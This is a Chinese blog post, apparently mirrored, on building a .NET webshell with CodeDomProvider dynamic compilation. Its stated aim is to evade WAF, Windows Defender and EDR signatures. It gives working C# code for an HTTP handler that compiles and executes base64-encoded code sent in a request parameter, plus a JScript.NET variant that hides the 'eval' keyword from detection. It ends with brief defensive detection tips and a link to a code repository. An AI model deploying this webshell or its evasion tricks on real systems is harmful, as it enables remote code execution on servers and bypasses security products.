zoukankan      html  css  js  c++  java
  • 基于.NET动态编译技术实现任意代码执行

    一、前言

    当下主流的Waf或Windows Defender等终端杀软、EDR大多都是从特征码查杀,在.Net和VBS下一句话木马中最常见的特征是eval,对于攻击者来说需要避开这个系统关键字,可从反序列化方式避开eval,但公开已久相信很多安全产品已经能够很好检测和阻断这类攻击请求。笔者从.NET 内置的CodeDomProvider类下手实现动态编译.NET代码,指明JScrip或者C#作为编译语言,编译的WebShell目前Windows Defender不会查杀。而防御者从流量或终端识别 "CodeDomProvider.CreateProvider、CreateInstance"等特征码。

    二、动态编译

    .Net可通过编译技术将外部输入的字符串作为代码执行,动态编译技术提供了最核心的两个类CodeDomProvider 和 CompilerParameters,前者相当于编译器,后者相当于编译器参数,CodeDomProvider支持多种语言(如C#、VB、Jscript),编译器参数CompilerParameters.GenerateExecutable默认表示生成dll,GenerateInMemory= true时表示在内存中加载,CompileAssemblyFromSource表示程序集的数据源,再将编译产生的结果生成程序集供反射调用。最后通过CreateInstance实例化对象并反射调用自定义类中的方法。

    CodeDomProvider compiler = CodeDomProvider.CreateProvider("C#"); ;     //编译器
    CompilerParameters comPara = new CompilerParameters();   //编译器参数
    comPara.ReferencedAssemblies.Add("System.dll"); //添加引用
    comPara.GenerateExecutable = false; //生成exe
    comPara.GenerateInMemory = true; //内存中
    CompilerResults compilerResults = compiler.CompileAssemblyFromSource(comPara, SourceText(txt)); //编译数据的来源
    Assembly objAssembly = compilerResults.CompiledAssembly; //编译成程序集
    object objInstance = objAssembly.CreateInstance("Neteye.NeteyeInput"); //创建对象
    MethodInfo objMifo = objInstance.GetType().GetMethod("OutPut"); //反射调用方法
    var result = objMifo.Invoke(objInstance, null);
    

    三、落地实现

    上述代码里的SourceText方法需提供编译的C#源代码,笔者创建了NeteyeInput类,如下

    public static string SourceText(string txt)
            {
                StringBuilder sb = new StringBuilder();
                sb.Append("using System;");
                sb.Append(Environment.NewLine);
                sb.Append("namespace  Neteye");
                sb.Append(Environment.NewLine);
                sb.Append("{");
                sb.Append(Environment.NewLine);
                sb.Append("    public class NeteyeInput");
                sb.Append(Environment.NewLine);
                sb.Append("    {");
                sb.Append(Environment.NewLine);
                sb.Append("        public void OutPut()");
                sb.Append(Environment.NewLine);
                sb.Append("        {");
                sb.Append(Environment.NewLine);
                sb.Append(Encoding.GetEncoding("UTF-8").GetString(Convert.FromBase64String(txt)));
                sb.Append(Environment.NewLine);
                sb.Append("        }");
                sb.Append(Environment.NewLine);
                sb.Append("    }");
                sb.Append(Environment.NewLine);
                sb.Append("}");
                string code = sb.ToString();
                return code;
            }
    

    类里声明了OutPut方法,该方法里通过Base64解码得到输入的原生字符串,笔者在这里以计算器作为演示,将“System.Diagnostics.Process.Start("cmd.exe","/c calc");” 编码为

    U3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MuU3RhcnQoImNtZC5leGUiLCIvYyBjYWxjIik7

    最后在一般处理程序ProcessRequest方法中调用

    public void ProcessRequest(HttpContext context)
            {
                context.Response.ContentType = "text/plain";
                if (!string.IsNullOrEmpty(context.Request["txt"]))
                {
                    DynamicCodeExecute(context.Request["txt"]); //start calc: U3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MuU3RhcnQoImNtZC5leGUiLCIvYyBjYWxjIik7
                    context.Response.Write("Execute Status: Success!");
                }
                else
                {
                    context.Response.Write("Just For Fun, Please Input txt!");
                }
            }

    四、其他方法

    • Jscript.Net 动态编译拆解eval

    在.NET安全领域中一句话木马主流的都是交给eval关键词执行,而很多安全产品都会对此重点查杀,所以笔者需要避开eval,而在.NET中eval只存在于Jscript.Net,所以需要将动态编译器指定为Jscript,其余和C#版本的动态编译基本一致,笔者通过插入无关字符将eval拆解掉,代码如下

    private static readonly string _jscriptClassText =
            @"import System;
                class JScriptRun
                {
                    public static function RunExp(expression : String) : String
                    {
                        return e/*@Ivan1ee@*/v/*@Ivan1ee@*/a/*@Ivan1ee@*/l(expression);
                    }
                }";

    只需在编译的时候替换掉无关字符串“/@Ivan1ee@/”,最后编译后反射执行目标方法。

    CompilerResults results = compiler.CompileAssemblyFromSource(parameters, _jscriptClassText.Replace("/*@Ivan1ee@*/",""));

    五、防御措施

    • 一般web应用使用场景不多,检测特征码:CodeDomProvider.CreateProvider、CreateInstance等等,一旦告警需格外关注;

    • 由于编译生成的程序集以临时文件保存在硬盘,需加入对可写目录下dll文件内容的监控;

    • 文章涉及的代码已经打包在 "https://github.com/Ivan1ee/.NETWebShell"

  • 相关阅读:
    linux驱动开发学习一:创建一个字符设备
    如何高效的对有序数组去重
    找到缺失的第一个正整数
    .NET不可变集合已经正式发布
    中国人唯一不认可的成功——就是家庭的和睦,人生的平淡【转】
    自己动手搭建 MongoDB 环境,并建立一个 .NET HelloWorld 程序测试
    ASP.NET MVC 中如何用自定义 Handler 来处理来自 AJAX 请求的 HttpRequestValidationException 错误
    自己动手搭建 Redis 环境,并建立一个 .NET HelloWorld 程序测试
    ServiceStack 介绍
    一步一步实战扩展 ASP.NET Route,实现小写 URL、个性化 URL
  • 原文地址:https://www.cnblogs.com/Ivan1ee/p/14525205.html
Copyright © 2011-2022 走看看